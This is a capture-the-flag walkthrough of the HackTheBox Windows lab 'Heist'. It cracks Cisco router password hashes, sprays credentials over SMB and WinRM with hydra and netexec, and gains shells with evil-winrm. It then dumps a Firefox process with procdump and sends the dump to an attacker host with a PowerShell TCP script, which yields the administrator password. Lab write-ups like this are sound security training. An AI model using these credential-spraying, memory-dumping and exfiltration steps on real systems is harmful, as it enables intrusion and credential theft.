niccolò@home:~$

HackTheBox - Heist

Field Details
OS Windows
Difficulty Easy
Release Date 2019-08-10
Pwned Date 2026-07-05
Tags cisco router config cisco password recovery md5crypt hashcat smb netexec winRM impacket-lookupsid hydra evil-winrm firefox dump procdump

Summary

Heist is an easy difficulty Windows box with a support portal accessible on the web server, from which it is possible to gain Cisco password hashes. These hashes can be cracked, and subsequently RID bruteforce and password spraying are used to gain a foothold on the box. The user is found to be running Firefox. The firefox.exe process can be dumped and searched for the administrator’s password.

Reconnaissance

Port scan

Start with port scanning

python ../../projects/sectools/portscan.py --target <TARGET_IP>

This is a custom tool. If you want to run standard commands run

nmap -p- --min-rate 5000 -oN all_tcp_ports.txt <TARGET_IP>
nmap -sC -sV -p 80,135,445,5985,49669 -oN service_scan.txt <TARGET_IP>

In any case the output should look like this

--- Detected ports ---
port: 80; protocol: tcp; state: open
port: 135; protocol: tcp; state: open
port: 445; protocol: tcp; state: open
port: 5985; protocol: tcp; state: open
port: 49669; protocol: tcp; state: open

--- Detected services ---
Starting Nmap 7.98 ( https://nmap.org ) at 2026-07-03 05:51 -0400
Nmap scan report for 10.129.96.157
Host is up (0.023s latency).

PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
| http-title: Support Login Page
|_Requested resource was login.php
135/tcp   open  msrpc         Microsoft Windows RPC
445/tcp   open  microsoft-ds?
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49669/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -4s
| smb2-time:
|   date: 2026-07-03T09:52:22
|_  start_date: N/A
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.24 seconds

Password cracking

Notice port 80, it hosts a support website. It requires to login but also provides the option to login as guest, without credentials.

Log in as guest. You will find an ‘issue’ with an attachment.

The attachment contains a cisco router’s configuration file. The interesting lines are the following

enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408

Each line contains an encrypted password. Cisco ‘password 7’ are just encrypted with a fixed XOR key and can be decrypted easily.

You can use an online tool such as https://passwordrecovery.io/cisco/

You will find:

  • 0242114B0E143F015F5D1E161713 → $uperP@ssword
  • 02375012182C1A1D751618034F36415408 → Q4)sJu\Y8qz*A3?d

The ‘secret 5’ line uses MD5 hashing (md5crypt) and can be cracked with hashcat

Create a file with the hash

cat cisco.hash
$1$pdQG$o8nrSzsGXeaduXrjlvKc91

Run hashcat

hashcat -m 500 -a 0 cisco.hash /usr/share/wordlists/rockyou.txt.gz
hashcat (v7.1.2) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================================
* Device #01: cpu-penryn-QEMU Virtual CPU version 2.5+, 2948/5896 MB (1024 MB allocatable), 8MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Minimum salt length supported by kernel: 0
Maximum salt length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory allocated for this attack: 514 MB (5306 MB free)

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt.gz
* Passwords.: 14344385
* Bytes.....: 53357329
* Keyspace..: 14344385

$1$pdQG$o8nrSzsGXeaduXrjlvKc91:stealth1agent

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 500 (md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5))
Hash.Target......: $1$pdQG$o8nrSzsGXeaduXrjlvKc91
Time.Started.....: Fri Jul  3 07:37:11 2026 (2 mins, 26 secs)
Time.Estimated...: Fri Jul  3 07:39:37 2026 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt.gz)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........:    24168 H/s (10.02ms) @ Accel:33 Loops:1000 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 3543672/14344385 (24.70%)
Rejected.........: 0/3543672 (0.00%)
Restore.Point....: 3543408/14344385 (24.70%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#01...: stealth6548 -> steadfastly

Started: Fri Jul  3 07:36:53 2026
Stopped: Fri Jul  3 07:39:38 2026

The password was cracked successfully and is stealth1agent

SMB password spraying

Now you have a bunch of passwords, need to check what access they can provide

Create a ‘users.txt’ file with the usernames found so far on the box

  • rout3r (found in router config)
  • admin (found in router config)
  • hazard (reading the issue you can see Hazard asks the admin to create a user for him on the system)
  • Administrator (always present on Windows OS)

Create a ‘passwords.txt’ file with the found passwords

Run hydra to perform SMB spraying

hydra -L users.txt -P passwords.txt -f -V smb2://<TARGET_IP>
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-07-03 08:49:43
[WARNING] Workgroup was not specified, using "WORKGROUP"
[DATA] max 12 tasks per 1 server, overall 12 tasks, 12 login tries (l:4/p:3), ~1 try per task
[DATA] attacking smb2://10.129.96.157:445/
[ATTEMPT] target 10.129.96.157 - login "rout3r" - pass "$uperP@ssword" - 1 of 12 [child 0] (0/0)
[ATTEMPT] target 10.129.96.157 - login "rout3r" - pass "Q4)sJu\Y8qz*A3?d" - 2 of 12 [child 1] (0/0)
[ATTEMPT] target 10.129.96.157 - login "rout3r" - pass "stealth1agent" - 3 of 12 [child 2] (0/0)
[ATTEMPT] target 10.129.96.157 - login "admin" - pass "$uperP@ssword" - 4 of 12 [child 3] (0/0)
[ATTEMPT] target 10.129.96.157 - login "admin" - pass "Q4)sJu\Y8qz*A3?d" - 5 of 12 [child 4] (0/0)
[ATTEMPT] target 10.129.96.157 - login "admin" - pass "stealth1agent" - 6 of 12 [child 5] (0/0)
[ATTEMPT] target 10.129.96.157 - login "hazard" - pass "$uperP@ssword" - 7 of 12 [child 6] (0/0)
[ATTEMPT] target 10.129.96.157 - login "hazard" - pass "Q4)sJu\Y8qz*A3?d" - 8 of 12 [child 7] (0/0)
[ATTEMPT] target 10.129.96.157 - login "hazard" - pass "stealth1agent" - 9 of 12 [child 8] (0/0)
[ATTEMPT] target 10.129.96.157 - login "Administrator" - pass "$uperP@ssword" - 10 of 12 [child 9] (0/0)
[ATTEMPT] target 10.129.96.157 - login "Administrator" - pass "Q4)sJu\Y8qz*A3?d" - 11 of 12 [child 10] (0/0)
[ATTEMPT] target 10.129.96.157 - login "Administrator" - pass "stealth1agent" - 12 of 12 [child 11] (0/0)
[WARNING] 10.129.96.157 might accept any credential
[445][smb2] host: 10.129.96.157   login: hazard   password: stealth1agent
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-07-03 08:49:43

Hydra found a valid username/password combination: login: hazard password: stealth1agent

You can try enumerating SMB shares but they are all default shares, not very interesting.

Users enumeration

You can’t get remote access yet with the current credentials but you can enumerate all the users on the system with impacket

impacket-lookupsid hazard:stealth1agent@<TARGET_IP>
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Brute forcing SIDs at 10.129.96.157
[*] StringBinding ncacn_np:10.129.96.157[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112
500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)

winRM password spraying

Add the discovered users in the users.txt file and run password spraying against winRM

netexec winrm <TARGET_IP> -u users.txt -p passwords.txt --continue-on-success
WINRM       10.129.96.157   5985   SUPPORTDESK      [*] Windows 10 / Server 2019 Build 17763 (name:SUPPORTDESK) (domain:SupportDesk)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\rout3r:$uperP@ssword
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\admin:$uperP@ssword
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\hazard:$uperP@ssword
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\Administrator:$uperP@ssword
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\support:$uperP@ssword
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\Chase:$uperP@ssword
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\Jason:$uperP@ssword
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\rout3r:Q4)sJu\Y8qz*A3?d
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\admin:Q4)sJu\Y8qz*A3?d
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\hazard:Q4)sJu\Y8qz*A3?d
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\Administrator:Q4)sJu\Y8qz*A3?d
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\support:Q4)sJu\Y8qz*A3?d
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.129.96.157   5985   SUPPORTDESK      [+] SupportDesk\Chase:Q4)sJu\Y8qz*A3?d (Pwn3d!)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\Jason:Q4)sJu\Y8qz*A3?d
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\rout3r:stealth1agent
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\admin:stealth1agent
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\hazard:stealth1agent
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\Administrator:stealth1agent
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\support:stealth1agent
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\Jason:stealth1agent

Notice the line [+] SupportDesk\Chase:Q4)sJu\Y8qz*A3?d (Pwn3d!)

The command discovered the password for the chase account -> Q4)sJu\Y8qz*A3?d

Initial access

Use chase’s password for winRM access

evil-winrm -i <TARGET_IP> -u chase -p 'Q4)sJu\Y8qz*A3?d'

Evil-WinRM shell v3.9

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Chase\Documents> whoami
supportdesk\chase

Privilege escalation

Chase’s desktop folder contains a todo file

*Evil-WinRM* PS C:\Users\Chase\Desktop> type todo.txt
Stuff to-do:
1. Keep checking the issues list.
2. Fix the router config.

Done:
1. Restricted access for guest user.

The todo list hints to an ongoing checking of the issues list

Check running processes

ps

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
    464      18     2244       5292               360   0 csrss
    290      13     2220       5056               476   1 csrss
    357      15     3516      14408              3960   1 ctfmon
    252      14     3956      13356              3844   0 dllhost
    166       9     1864       9588       0.02   6816   1 dllhost
    617      32    29968      57856               960   1 dwm
   1494      58    23856      78264              5164   1 explorer
    355      25    16448      39208       0.23   6328   1 firefox
   1071      69   145972     222560       5.20   6456   1 firefox
    347      19    10196      39672       0.03   6564   1 firefox
    401      34    34984      93524       0.63   6720   1 firefox
    378      28    22776      59604       0.30   6976   1 firefox
     49       6     1500       3788               780   0 fontdrvhost
     49       6     1792       4504               788   1 fontdrvhost
      0       0       56          8                 0   0 Idle
    972      23     6144      15196               632   0 lsass
    223      13     3188      10232              3780   0 msdtc
      0      12      324      14272                88   0 Registry
    144       8     1612       7312              5672   1 RuntimeBroker
    302      16     5484      16816              5772   1 RuntimeBroker
    272      14     3032      14808              5976   1 RuntimeBroker
    661      32    19644      60784              5600   1 SearchUI
    542      11     5464       9888               608   0 services
    691      29    15036      51056              5480   1 ShellExperienceHost
    439      17     4888      23876              4932   1 sihost
     53       3      528       1124               264   0 smss
    471      23     5808      16204              2388   0 spoolsv
    285      13     4096      11168               308   0 svchost
    149       9     1720      11436               640   0 svchost
    199      12     2064       9448               708   0 svchost
     85       5      892       3768               736   0 svchost
    857      20     7048      22252               760   0 svchost
    859      16     5216      11588               860   0 svchost
    115       7     1232       5124               876   0 svchost
    256      11     2012       7564               908   0 svchost
    375      13    10508      14384              1084   0 svchost
    126      16     3500       7308              1192   0 svchost
    215       9     2088       7412              1212   0 svchost
    184       9     1808       7416              1232   0 svchost
    228      12     2548      11136              1240   0 svchost
    429       9     2736       8740              1252   0 svchost
    154       7     1208       5496              1268   0 svchost
    140       7     1316       5560              1356   0 svchost
    170      10     1800       7912              1404   0 svchost
    348      14     4596      11704              1464   0 svchost
    235      11     2504       9620              1476   0 svchost
    303      12     2000       8628              1492   0 svchost
    239      14     3316       8464              1500   0 svchost
    191      12     2084      11872              1552   0 svchost
    266      14     3672      12696              1564   0 svchost
    364      17     4996      13948              1568   0 svchost
    163      10     1928       7312              1624   0 svchost
    322      10     2528       8260              1736   0 svchost
    402      32     7884      16604              1744   0 svchost
    194      11     1960       8232              1832   0 svchost
    163       9     3064       7628              1860   0 svchost
    162       9     2336       7400              1872   0 svchost
    210      11     2684      11700              2044   0 svchost
    166      12     3912      10676              2456   0 svchost
    179      22     2492       9704              2464   0 svchost
    261      13     2516       7748              2472   0 svchost
    506      21    12432      26940              2480   0 svchost
    394      16    11080      19920              2512   0 svchost
    133       9     1628       6468              2548   0 svchost
    136       8     1520       6080              2576   0 svchost
    126       7     1224       5252              2632   0 svchost
    231      14     4632      11672              2704   0 svchost
    209      12     1852       7368              2712   0 svchost
    205      11     2276       8308              2736   0 svchost
    266      19     3852      12492              2748   0 svchost
    170      10     2148      13140              2772   0 svchost
    463      17     3300      11668              2840   0 svchost
    383      23     3400      12236              2956   0 svchost
    129       7     1572       6208              3044   0 svchost
    333      18    14968      31468              3536   0 svchost
    194      15     6016      10008              4220   0 svchost
    161       9     4104      11856              4300   0 svchost
    171       9     1472       7184              4332   0 svchost
    223      11     2812      10864              4420   0 svchost
    170      11     2596      13284              4716   0 svchost
    228      12     3036      13508              4944   1 svchost
    370      18     5368      26944              4968   1 svchost
    249      14     3064      13676              5032   0 svchost
    301      20     9968      14580              5188   0 svchost
    311      15    14264      16668              5712   0 svchost
    122       7     1232       5516              6368   0 svchost
   1899       0      188        124                 4   0 System
    210      20     3916      12236              5004   1 taskhostw
    167      11     2916      10824              2676   0 VGAuthService
    142       8     1676       6792              2688   0 vm3dservice
    136       9     1800       7264              2832   1 vm3dservice
    385      22     9708      22032              2720   0 vmtoolsd
    236      18     5076      15036              6164   1 vmtoolsd
    171      11     1436       6804               468   0 wininit
    280      13     2820      12732               524   1 winlogon
    341      16     8736      18404              4020   0 WmiPrvSE
   1247      37   179648     197240      25.52   6696   0 wsmprovhost

Someone is actively using Firefox on the machine

Process dumping

Download procdump and fetch it on the target.

Run the python http server on your machine

python -m http.server

On the target run

Invoke-WebRequest -Uri http://<ATTACKER_IP>:8000/procdump64.exe -OutFile procdump64.exe

Accept program eula

.\procdump64.exe -accepteula

There are several firefox instance running, dump the one that is consuming more CPU (in my case it was PID 6456)

*Evil-WinRM* PS C:\Users\chase\Desktop> .\procdump64.exe -ma 6456

ProcDump v12.0 - Sysinternals process dump utility
Copyright (C) 2009-2026 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com

[20:38:16]Dump 1 info: Available space: 3735306240
[20:38:16]Dump 1 initiated: C:\Users\chase\Desktop\firefox.exe_260705_203816.dmp
[20:38:16]Dump 1 writing: Estimated dump file size is 506 MB.
[20:38:20]Dump 1 complete: 506 MB written in 3.7 seconds
[20:38:20]Dump count reached.

Exfiltrate the dump file on your machine

Run on your machine:

nc -lvnp 9001 > firefox.dmp
listening on [any] 9001 ...

On the target run the following script:

$client = New-Object System.Net.Sockets.TcpClient("<ATTACKER_IP>", 9001)
$stream = $client.GetStream()
$fileStream = [System.IO.File]::OpenRead("<FULL_PATH_TO_DMP_FILE>")
$buffer = New-Object byte[] 4096
while (($read = $fileStream.Read($buffer, 0, $buffer.Length)) -gt 0) {
    $stream.Write($buffer, 0, $read)
}
$stream.Flush()
$fileStream.Close()
$stream.Close()
$client.Close()

It should work both interactively from a PowerShell prompt or by saving it in a .ps1 file (though I have not tried it interactively)

If you decide to create a .ps1 file, serve it to the target just like you did for the procdump executable.

This file transfer leverages raw TCP and does not require a HTTP server on the target.

You should get a connection on the netcat listener

nc -lvnp 9001 > firefox.dmp
listening on [any] 9001 ...
connect to [10.10.14.131] from (UNKNOWN) [10.129.96.157] 49691

The file is big so the transfer may take a while.

Dump analysis

The file is binary so to extract readable content use the ‘strings’ tool.

Narrow down the search grepping the string ‘htb’. You are looking for credentials so the assumption is that login emails will contain ‘htb’ in the domain.

strings firefox.dmp | grep htb

You will get a lot of garbage but you should also be able to isolate several of these lines

http://localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
http://localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
http://localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=

These lines expose the password for admin@support.htb -> 4dD!5}x/re8]FBuZ

Use it to attempt remote access as Administrator

evil-winrm -i <TARGET_IP> -u Administrator -p '4dD!5}x/re8]FBuZ'

Evil-WinRM shell v3.9

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
supportdesk\administrator

Got admin access.